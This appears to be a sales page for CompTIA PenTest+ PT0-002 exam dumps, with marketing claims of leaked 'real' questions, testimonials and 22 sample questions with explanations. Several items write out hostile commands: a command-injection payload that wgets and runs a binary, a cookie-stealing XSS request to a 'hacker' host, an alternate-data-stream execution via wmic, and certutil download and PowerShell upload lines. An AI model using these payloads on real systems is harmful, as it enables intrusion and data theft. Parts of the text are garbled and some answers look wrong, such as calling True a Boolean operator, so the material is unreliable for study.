We just do not compromise with the bright future of our respected customers. PassExam4Sure takes the future of clients quite seriously and we ensure that our PT0-002 exam dumps get you through the line. If you think that our exam question and answers did not help you much with the exam paper and you failed it somehow, we will happily return all of your invested money with a full 100% refund.
100% Real Questions
We verify and assure the authenticity of CompTIA PT0-002 exam dumps PDFs with 100% real and exam-oriented questions. Our exam questions and answers comprise 100% real exam questions from the latest and most recent exams in which you’re going to appear. So, our majestic library of exam dumps for CompTIA PT0-002 is surely going to push on forward on the path of success.
Security & Privacy
Free for download CompTIA PT0-002 demo papers are available for our customers to verify the authenticity of our legit helpful exam paper samples, and to authenticate what you will be getting from PassExam4Sure. We have tons of visitors daily who simply opt and try this process before making their purchase for CompTIA PT0-002 exam dumps.
Last Week PT0-002 Exam Results
271
Customers Passed CompTIA PT0-002 Exam
93%
Average Score In Real PT0-002 Exam
95%
Questions came from our PT0-002 dumps.
Authentic PT0-002 Exam Dumps
Prepare for CompTIA PT0-002 Exam like a Pro
PassExam4Sure is famous for its top-notch services for providing the most helpful, accurate, and up-to-date material for CompTIA PT0-002 exam in form of PDFs. Our PT0-002 dumps for this particular exam is timely tested for any reviews in the content and if it needs any format changes or addition of new questions as per new exams conducted in recent times. Our highly-qualified professionals assure the guarantee that you will be passing out your exam with at least 85% marks overall. PassExam4Sure CompTIA PT0-002 ProvenDumps is the best possible way to prepare and pass your certification exam.
Easy Access and Friendly UI
PassExam4Sure is your best buddy in providing you with the latest and most accurate material without any hidden charges or pointless scrolling. We value your time and we strive hard to provide you with the best possible formatting of the PDFs with accurate, to the point, and vital information about CompTIA PT0-002. PassExam4Sure is your 24/7 guide partner and our exam material is curated in a way that it will be easily readable on all smartphone devices, tabs, and laptop PCs.
PassExam4Sure - The Undisputed King for Preparing PT0-002 Exam
We have a sheer focus on providing you with the best course material for CompTIA PT0-002. So that you may prepare your exam like a pro, and get certified within no time. Our practice exam material will give you the necessary confidence you need to sit, relax, and do the exam in a real exam environment. If you truly crave success then simply sign up for PassExam4Sure CompTIA PT0-002 exam material. There are millions of people all over the globe who have completed their certification using PassExam4Sure exam dumps for CompTIA PT0-002.
100% Authentic CompTIA PT0-002 – Study Guide (Update 2024)
Our CompTIA PT0-002 exam questions and answers are reviewed by us on weekly basis. Our team of highly qualified CompTIA professionals, who once also cleared the exams using our certification content does all the analysis of our recent exam dumps. The team makes sure that you will be getting the latest and the greatest exam content to practice, and polish your skills the right way. All you got to do now is to practice, practice a lot by taking our demo questions exam, and making sure that you prepare well for the final examination. CompTIA PT0-002 test is going to test you, play with your mind and psychology, and so be prepared for what’s coming. PassExam4Sure is here to help you and guide you in all steps you will be going through in your preparation for glory. Our free downloadable demo content can be checked out if you feel like testing us before investing your hard-earned money. PassExam4Sure guaranteed your success in the CompTIA PT0-002 exam because we have the newest and most authentic exam material that cannot be found anywhere else on the internet.
CompTIA PT0-002 Sample Questions
Question # 1
A penetration tester has been hired to perform a physical penetration test to gain access toa secure room within a client’s building. Exterior reconnaissance identifies two entrances, aWiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance?c
A. Wardriving B. Shodan C. Recon-ng D. Aircrack-ng
Answer: C
Question # 2
Given the following script:while True:print ("Hello World")Which of the following describes True?
A. A while loop B. A conditional C. A Boolean operator D. An arithmetic operator
Answer: C
Explanation: True is a Boolean operator in Python, which is an operator that returns either
True or False values based on logical conditions. Boolean operators can be used in
expressions or statements that evaluate to True or False values, such as comparisons,
assignments, or loops. In the code, True is used as the condition for a while loop, which is
a loop that repeats a block of code as long as the condition is True. The code will print
“Hello World” indefinitely because True will always be True and the loop will never end. The
other options are not valid descriptions of True.
Question # 3
A penetration tester was able to gain access to a system using an exploit. The following isa snippet of the code that was utilized:exploit = “POST ”exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} –c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”exploit += “HTTP/1.1”Which of the following commands should the penetration tester run post-engagement?
A. grep –v apache ~/.bash_history > ~/.bash_history B. rm –rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM “apache” /F
Answer: B
Explanation:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute
arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1 chmod 777 apache: change the permissions of the file to allow read, write, and
execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to
the system or performs some other malicious action. Therefore, the penetration tester
should run the command rm -rf /tmp/apache post-engagement to remove the file and its
traces from the system. The other commands are not effective or relevant for this purpose.
Question # 4
A penetration tester has obtained shell access to a Windows host and wants to run aspecially crafted binary for later execution using the wmic.exe process call create function.Which of the following OS or filesystem mechanisms is MOST likely to support thisobjective?
A. Alternate data streams B. PowerShell modules C. MP4 steganography D. PsExec
Answer: A
Explanation: Alternate data streams (ADS) are a feature of the NTFS file system that
allows storing additional data in a file without affecting its size, name, or functionality. ADS can be used to hide or embed data or executable code in a file, such as a specially crafted
binary for later execution. ADS can be created or accessed using various tools or
commands, such as the command prompt, PowerShell, or Sysinternals12. For example,
the following command can create an ADS named secret.exe in a file named test.txt and
run it using wmic.exe process call create function: type secret.exe > test.txt:secret.exe &
wmic process call create "cmd.exe /c test.txt:secret.exe"
Question # 5
Which of the following is a regulatory compliance standard that focuses on user privacy byimplementing the right to be forgotten?
A. NIST SP 800-53 B. ISO 27001 C. GDPR
Answer: C
Explanation: GDPR is a regulatory compliance standard that focuses on user privacy by
implementing the right to be forgotten. GDPR stands for General Data Protection
Regulation, and it is a law that applies to the European Union and the United Kingdom.
GDPR gives individuals the right to request their personal data be deleted by data
controllers and processors under certain circumstances, such as when the data is no
longer necessary, when the consent is withdrawn, or when the data was unlawfully
processed. GDPR also imposes other obligations and rights related to data protection,
such as data minimization, data portability, data breach notification, and consent
management. The other options are not regulatory compliance standards that focus on
user privacy by implementing the right to be forgotten. NIST SP 800-53 is a set of security
and privacy controls for federal information systems and organizations in the United States.
ISO 27001 is an international standard that specifies the requirements for an information
security management system.
Question # 6
Penetration on an assessment for a client organization, a penetration tester noticesnumerous outdated software package versions were installed ...s-critical servers. Which ofthe following would best mitigate this issue?
A. Implementation of patching and change control programs B. Revision of client scripts used to perform system updates C. Remedial training for the client's systems administrators D. Refrainment from patching systems until quality assurance approves
Answer: A
Explanation: The best way to mitigate this issue is to implement patching and change
control programs, which are processes that involve applying updates or fixes to software
packages to address vulnerabilities, bugs, or performance issues, and managing or documenting the changes made to the software packages to ensure consistency,
compatibility, and security. Patching and change control programs can help prevent or
reduce the risk of attacks that exploit outdated software package versions, which may
contain known or unknown vulnerabilities that can compromise the security or functionality
of the systems or servers. Patching and change control programs can be implemented by
using tools such as WSUS, which is a tool that can manage and distribute updates for
Windows systems and applications1, or Git, which is a tool that can track and control
changes to source code or files2. The other options are not valid ways to mitigate this
issue. Revision of client scripts used to perform system updates is not a sufficient way to
mitigate this issue, as it may not address the root cause of why the software package
versions are outdated, such as lack of awareness, resources, or policies. Remedial training
for the client’s systems administrators is not a direct way to mitigate this issue, as it may
not result in immediate or effective actions to update the software package versions.
Refrainment from patching systems until quality assurance approves is not a way to
mitigate this issue, but rather a potential cause or barrier for why the software package
versions are outdated.
Question # 7
Which of the following OSSTM testing methodologies should be used to test under theworst conditions?
A. Tandem B. Reversal C. Semi-authorized D. Known environment
Answer: D
Explanation: The OSSTM testing methodology that should be used to test under the
worst conditions is known environment, which is a testing approach that assumes that the
tester has full knowledge of the target system or network, such as its architecture,
configuration, vulnerabilities, or defenses. A known environment testing can simulate a
worst-case scenario, where an attacker has gained access to sensitive information or
insider knowledge about the target, and can exploit it to launch more sophisticated or targeted attacks. A known environment testing can also help identify the most critical or
high-risk areas of the target, and provide recommendations for improving its security
posture. The other options are not OSSTM testing methodologies that should be used to
test under the worst conditions. Tandem is a testing approach that involves two testers
working together on the same target, one as an attacker and one as a defender, to
simulate a realistic attack scenario and evaluate the effectiveness of the defense
mechanisms. Reversal is a testing approach that involves switching roles between the
tester and the client, where the tester acts as a defender and the client acts as an attacker,
to assess the security awareness and skills of the client. Semi-authorized is a testing
approach that involves giving partial or limited authorization or access to the tester, such as
a user account or a network segment, to simulate an attack scenario where an attacker has
compromised a legitimate user or device.
Question # 8
A client wants a security assessment company to perform a penetration test against its hotsite. The purpose of the test is to determine the effectiveness of the defenses that protectagainst disruptions to business continuity. Which of the following is the MOST importantaction to take before starting this type of assessment?
A. Ensure the client has signed the SOW. B. Verify the client has granted network access to the hot site. C. Determine if the failover environment relies on resources not owned by the client. D. Establish communication and escalation procedures with the client.
Answer: A
Explanation:
The statement of work (SOW) is a document that defines the scope, objectives,
deliverables, and timeline of a penetration testing engagement. It is important to have the
client sign the SOW before starting the assessment to avoid any legal or contractual
issues.
Question # 9
Which of the following factors would a penetration tester most likely consider when testingat a location?
A. Determine if visas are required. B. Ensure all testers can access all sites. C. Verify the tools being used are legal for use at all sites. D. Establish the time of the day when a test can occur.
Answer: D
Explanation: One of the factors that a penetration tester would most likely consider when
testing at a location is to establish the time of day when a test can occur. This factor can
affect the scope, duration, and impact of the test, as well as the availability and response of
the client and the testers. Testing at different times of day can have different advantages
and disadvantages, such as testing during business hours to simulate realistic scenarios
and traffic patterns, or testing after hours to reduce disruption and interference. Testing at
different locations may also require adjusting for different time zones and daylight saving
times. Establishing the time of day when a test can occur can help plan and coordinate the
test effectively and avoid confusion or conflict with the client or other parties involved in the
test. The other options are not factors that a penetration tester would most likely consider
when testing at a location.
Question # 10
Given the following code: var+img=new+Image();img.src=”<a href="http://hacker/%20+%20document.cookie">http://hacker/%20+%20document.cookie</a>;</SCvar+img=new+Image();img.src=”<a href="http://hacker/%20+%20document.cookie">http://hacker/%20+%20document.cookie</a>;</SC RIPT>Which of the following are the BEST methods to prevent against this type of attack?(Choose two.)
A. Web-application firewall B. Parameterized queries C. Output encoding D. Session tokens E. Input validation F. Base64 encoding
Answer: C,E
Explanation: Encoding (commonly called “Output Encoding”) involves translating special
characters into some different but equivalent form that is no longer dangerous in the target
interpreter, for example translating the < character into the < string when writing to an
HTML page.
Output encoding and input validation are two of the best methods to prevent against this
type of attack, which is known as cross-site scripting (XSS). Output encoding is a technique
that converts user-supplied input into a safe format that prevents malicious scripts from
being executed by browsers or applications. Input validation is a technique that checks
user-supplied input against a set of rules or filters that reject any invalid or malicious data.
Web-application firewall is a device or software that monitors and blocks web traffic based
on predefined rules or signatures, but it may not catch all XSS attacks. Parameterized
queries are a technique that separates user input from SQL statements to prevent SQL
injection attacks, but they do not prevent XSS attacks. Session tokens are values that are
used to maintain state and identify users across web requests, but they do not prevent XSS
attacks. Base64 encoding is a technique that converts binary data into ASCII characters for
transmission or storage purposes, but it does not prevent XSS attacks.
Question # 11
A penetration tester learned that when users request password resets, help desk analystschange users' passwords to 123change. The penetration tester decides to brute force aninternet-facing webmail to check which users are still using the temporary password. Thetester configures the brute-force tool to test usernames found on a text file and the... Whichof the following techniques is the penetration tester using?
A. Password brute force attack B. SQL injection C. Password spraying D. Kerberoasting
Answer: A
Explanation: The penetration tester is using a password brute force attack, which is a
type of password guessing attack that involves trying many possible combinations of
passwords against a single username or account. A password brute force attack can be
effective when the password is known to be weak, simple, or predictable, such as a default
or temporary password. In this case, the penetration tester knows that the help desk
analysts change users’ passwords to 123change when they request password resets, and
decides to brute force the webmail with this password and a list of usernames. A password
brute force attack can be done by using tools such as Hydra, which can perform
parallelized login attacks against various protocols and services1. The other options are not
techniques that the penetration tester is using. SQL injection is a type of attack that exploits
a vulnerability in a web application that allows an attacker to execute malicious SQL
statements on a database server. Password spraying is a type of password guessing
attack that involves trying one or a few common passwords against many usernames or
accounts. Kerberoasting is a type of attack that exploits a vulnerability in the Kerberos
authentication protocol that allows an attacker to request and crack service tickets for
service accounts with weak passwords.
Question # 12
A penetration tester is exploring a client’s website. The tester performs a curl commandand obtains the following:* Connected to 10.2.11.144 (::1) port 80 (#0)> GET /readmine.html HTTP/1.1> Host: 10.2.11.144> User-Agent: curl/7.67.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200< Date: Tue, 02 Feb 2021 21:46:47 GMT< Server: Apache/2.4.41 (Debian)< Content-Length: 317< Content-Type: text/html; charset=iso-8859-1<<!DOCTYPE html><html lang=”en”><head> <meta name=”viewport” content=”width=device-width” /><meta http-equiv=”Content-Type” content=”text/html; charset=utf-8” /><title>WordPress › ReadMe</title><link rel=”stylesheet” href=”wp-admin/css/install.css?ver=20100228” type=”text/css” /></head>Which of the following tools would be BEST for the penetration tester to use to explore thissite further?
A. Burp Suite B. DirBuster C. WPScan D. OWASP ZAP
Answer: C
Explanation: WPScan is a tool that can be used to scan WordPress sites for
vulnerabilities, such as outdated plugins, themes, or core files, misconfigured settings,
weak passwords, or user enumeration. The curl command reveals that the site is running
WordPress and has a readme.html file that may disclose the version number. Therefore,
WPScan would be the best tool to use to explore this site further. Burp Suite is a tool that
can be used to intercept and modify web requests and responses, but it does not specialize
in WordPress scanning. DirBuster is a tool that can be used to brute-force directories and
files on web servers, but it does not exploit WordPress vulnerabilities. OWASP ZAP is a
tool that can be used to perform web application security testing, but it does not focus on
When accessing the URL http://192.168.0-1/validate/user.php, a penetration testerobtained the following output ..d index: eid in /apache/www/validate/user.php line 12 ..d index: uid in /apache/www/validate/user.php line 13 ..d index: pw in /apache/www/validate/user.php line 14 ..d index: acl in /apache/www/validate/user.php line 15
A. Lack of code signing B. Incorrect command syntax C. Insufficient error handling D. Insecure data transmission
Answer: C
Explanation: The most probable cause for this output is insufficient error handling, which
is a coding flaw that occurs when a program does not handle errors or exceptions properly
or gracefully. Insufficient error handling can result in unwanted or unexpected behavior,
such as crashes, hangs, or leaks. In this case, the output shows that the program is
displaying warning messages that indicate undefined indexes in the user.php file. These
messages reveal the names of the variables and the file path that are used by the program,
which can expose sensitive information or clues to an attacker. The program should have
implemented error handling mechanisms, such as try-catch blocks, error logging, or
sanitizing output, to prevent these messages from being displayed or to handle them
appropriately. The other options are not plausible causes for this output. Lack of code
signing is a security flaw that occurs when a program does not have a digital signature that
verifies its authenticity and integrity. Incorrect command syntax is a user error that occurs
when a command is entered with wrong or missing parameters or options. Insecure data
transmission is a security flaw that occurs when data is sent over a network without
encryption or protection.
Question # 14
A penetration tester wrote the following comment in the final report: "Eighty-five percent ofthe systems tested were found to be prone to unauthorized access from the internet."Which of the following audiences was this message intended?
A. Systems administrators B. C-suite executives C. Data privacy ombudsman D. Regulatory officials
Answer: B
Explanation:
The comment in the final report was intended for C-suite executives, which are senior-level
managers or leaders in an organization, such as the chief executive officer (CEO), chief
financial officer (CFO), or chief information officer (CIO). C-suite executives are typically
interested in high-level summaries or overviews of the penetration test results, such as the
percentage of systems affected by a certain vulnerability or risk, the potential impact or cost
of a breach, or the recommended actions or priorities for remediation. C-suite executives
may not have the technical background or expertise to understand detailed or technical
information about the penetration test, such as specific vulnerabilities, exploits, tools, or
techniques. The comment in the final report provides a high-level summary of the
penetration test result that is relevant and understandable for C-suite executives. The other
audiences are not likely to be interested in this comment. Systems administrators are
technical staff who are responsible for installing, configuring, maintaining, and securing
systems and networks. They would be more interested in detailed or technical information
about the penetration test, such as specific vulnerabilities, exploits, tools, or techniques.
Data privacy ombudsman is a person who acts as an independent mediator between
individuals and organizations regarding data privacy issues or complaints. They would be
more interested in information about how the penetration test complied with data privacy
laws and regulations, such as GDPR or CCPA. Regulatory officials are authorities who
enforce compliance with laws and regulations related to a specific industry or sector, such
as finance, health care, or energy. They would be more interested in information about how
the penetration test complied with industry-specific standards and frameworks, such as
PCI-DSS, HIPAA, or NERC-CIP.
Question # 15
A penetration tester runs a scan against a server and obtains the following output:21/tcp open ftp Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-12-20 09:23AM 331 index.aspx| ftp-syst:135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2012 Std3389/tcp open ssl/ms-wbt-server| rdp-ntlm-info:| Target Name: WEB3| NetBIOS_Computer_Name: WEB3| Product_Version: 6.3.9600|_ System_Time: 2021-01-15T11:32:06+00:008443/tcp open http Microsoft IIS httpd 8.5| http-methods:|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/8.5|_http-title: IIS Windows ServerWhich of the following command sequences should the penetration tester try NEXT?
A. ftp 192.168.53.23 B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23 D. curl –X TRACE https://192.168.53.23:8443/index.aspx E. nmap –-script vuln –sV 192.168.53.23
Answer: A
Question # 16
In an unprotected network file repository, a penetration tester discovers a text filecontaining usernames and passwords in cleartext and a spreadsheet containing data for 50employees, including full names, roles, and serial numbers. The tester realizes some of thepasswords in the text file follow the format: <name- serial_number>. Which of the followingwould be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing. B. Recommend using a password manage/vault instead of text files to store passwordssecurely. C. Recommend configuring password complexity rules in all the systems and applications. D. Document the unprotected file repository as a finding in the penetration-testing report.
Answer: D
Question # 17
Company.com has hired a penetration tester to conduct a phishing test. The tester wants toset up a fake log-in page and harvest credentials when target employees click on links in aphishing email. Which of the following commands would best help the tester determinewhich cloud email provider the log-in page needs to mimic?
A. dig company.com MX B. whois company.com C. cur1 www.company.com D. dig company.com A
Answer: A
Explanation: The dig command is a tool that can be used to query DNS servers and
obtain information about domain names, such as IP addresses, mail servers, name
servers, or other records. The MX option specifies that the query is for mail exchange
records, which are records that indicate the mail servers responsible for accepting email
messages for a domain. Therefore, the command dig company.com MX would best help
the tester determine which cloud email provider the log-in page needs to mimic by showing
the mail servers for company.com. For example, if the output shows something like
company-com.mail.protection.outlook.com, then it means that company.com uses
Microsoft Outlook as its cloud email provider. The other commands are not as useful for
determining the cloud email provider. The whois command is a tool that can be used to
query domain name registration information, such as the owner, registrar, or expiration
date of a domain. The curl command is a tool that can be used to transfer data from or to a
server using various protocols, such as HTTP, FTP, or SMTP. The dig command with the A
option specifies that the query is for address records, which are records that map domain
names to IP addresses.
Question # 18
During a penetration test, a tester is in close proximity to a corporate mobile devicebelonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration testercan perform?
A. Sniff and then crack the WPS PIN on an associated WiFi device. B. Dump the user address book on the device. C. Break a connection between two Bluetooth devices. D. Transmit text messages to the device.
Answer: B
Explanation: Bluesnarfing is the unauthorized access of information from a wireless
device through a Bluetooth connection, often between phones, desktops, laptops, and
PDAs. This allows access to calendars, contact lists, emails and text messages, and on
some phones, users can copy pictures and private videos.
Question # 19
A company recently moved its software development architecture from VMs to containers.The company has asked a penetration tester to determine if the new containers areconfigured correctly against a DDoS attack. Which of the following should a tester performfirst?
A. Test the strength of the encryption settings. B. Determine if security tokens are easily available. C. Perform a vulnerability check against the hypervisor. D. .Scan the containers for open ports.
Answer: D
Explanation: The first step that a tester should perform to determine if the new containers
are configured correctly against a DDoS attack is to scan the containers for open ports.
Open ports are entry points for network communication and can expose services or
applications that may be vulnerable to DDoS attacks. Scanning the containers for open
ports can help the tester identify which services or applications are running on the
containers, and which ones may need to be secured or disabled to prevent DDoS attacks.
Scanning the containers for open ports can also help the tester discover any unauthorized
or malicious services or applications that may have been installed on the containers by
previous attackers or compromised containers. Scanning the containers for open ports can
be done by using tools such as Nmap, which can perform network scanning and
enumeration by sending packets to hosts and analyzing their responses1. The other
options are not the first steps that a tester should perform to determine if the new
containers are configured correctly against a DDoS attack. Testing the strength of the
encryption settings is not relevant to DDoS attacks, as encryption does not prevent or mitigate DDoS attacks, but rather protects data confidentiality and integrity. Determining if
security tokens are easily available is not relevant to DDoS attacks, as security tokens are
used for authentication and authorization, not for preventing or mitigating DDoS attacks.
Performing a vulnerability check against the hypervisor is not relevant to DDoS attacks, as
the hypervisor is not directly exposed to network traffic, but rather manages the virtual
machines or containers that run on it.
Question # 20
A penetration tester breaks into a company's office building and discovers the companydoes not have a shredding service. Which of the following attacks should the penetrationtester try next?
A. Dumpster diving B. Phishing C. Shoulder surfing D. Tailgating
Answer: A
Explanation: The penetration tester should try dumpster diving next, which is an attack
that involves searching through trash bins or dumpsters for discarded documents or items
that may contain sensitive or useful information. Dumpster diving can reveal information
such as passwords, account numbers, credit card numbers, invoices, receipts, memos,
contracts, or employee records. The penetration tester can use this information to gain
access to systems or networks, impersonate users or employees, or perform social
engineering attacks. The other options are not likely attacks that the penetration tester
should try next based on the discovery that the company does not have a shredding
service. Phishing is an attack that involves sending fraudulent emails that appear to be
from legitimate sources to trick users into revealing their credentials or clicking on malicious
links or attachments. Shoulder surfing is an attack that involves observing or spying on
users while they enter their credentials or perform other tasks on their devices. Tailgating is
an attack that involves following authorized personnel into a restricted area without proper
authorization or identification.
Question # 21
A penetration tester has obtained a low-privilege shell on a Windows server with a defaultconfiguration and now wants to explore the ability to exploit misconfigured servicepermissions. Which of the following commands would help the tester START this process?
A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’) C. schtasks /query /fo LIST /v | find /I “Next Run Time:” D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe
Accesschk64.exe is a tool that can be used to check service permissions and identify
potential privilege escalation vectors. The other commands are not relevant for this
purpose. Powershell is a scripting language that can be used to perform various tasks, but
in this case it uploads a file instead of downloading one. Schtasks is a command that can
be used to create or query scheduled tasks, but it does not help with service permissions.
Wget is a Linux command that can be used to download files from the web, but it does not
work on Windows by default.
Question # 22
Which of the following documents describes activities that are prohibited during ascheduled penetration test?
A. MSA B. NDA C. ROE D. SLA
Answer: C
Explanation: The document that describes activities that are prohibited during a scheduled penetration test is ROE, which stands for rules of engagement. ROE is a document that
defines the scope, objectives, methods, limitations, and expectations of a penetration test.
ROE can specify what activities are allowed or prohibited during the penetration test, such
as which targets, systems, networks, or services can be tested or attacked, which tools,
techniques, or exploits can be used or avoided, which times or dates can be scheduled or
excluded, or which impacts or risks can be accepted or mitigated. ROE can help ensure
that the penetration test is conducted in a legal, ethical, and professional manner, and that
it does not cause any harm or damage to the client or third parties. The other options are
not documents that describe activities that are prohibited during a scheduled penetration
test. MSA stands for master service agreement, which is a document that defines the
general terms and conditions of a contractual relationship between two parties, such as the
scope of work, payment terms, warranties, liabilities, or dispute resolution. NDA stands for
non-disclosure agreement, which is a document that defines the confidential information
that is shared between two parties during a business relationship, such as trade secrets,
intellectual property, or customer data. SLA stands for service level agreement, which is a
document that defines the quality and performance standards of a service provided by one
party to another party, such as availability, reliability, responsiveness, or security.
I had a frantic schedule at work and was therefore to continue with my studies and obtain a certain degree. One of my colleagues suggested me to add more certifications in my CV just to get promoted. I then sought guide guidance from PassExam4Sure to help me out to get prepare for my exams. PassExam4Sure granted me praiseworthy notes along with a study guide so that I can prepare well. I got gratifying scores.
Dan
PassExam4Sure allows the students to take help in the CompTIA exam so that they can pass with flying colors. PassExam4Sure has helped many students and is still helping new upcoming students to produce the best results in the CompTIA exam. I assure you that they have been providing the authentic and relevant material that would be handy for the students for the CompTIA exam. With PassExam4Sure now you do not have to worry before the exam, just go for it.
Edward
The exam material at PassExam4Sure is all worth it. The exam dumps I found for my PT0-002 test were up to the mark, updated according to the latest syllabus too. I have my complete trust in this amazing website, definitely going to purchase dumps for my next certification. Also, I would recommend PassExam4Sure to everyone who is pursuing greatness.
Mike
I am very happy that I had an opportunity to use the practice tests offered by PassExam4Sure, for getting prepared for the Test Prep PT0-002 exam. These practice tests prepared me for the real Test Prep PT0-002 exam questions, enabling me to pass the Certification Test Prep PT0-002 exam easily.
Ron
I never used this kind of exam prep, so I was pleasantly surprised when I was how good and professional the bundle was. The free stuff you can for free is not very valuable. You should just pay a small fee to get PassExam4Sure dumps. I bought it, studied hard enough, and passed it - everything I could expect.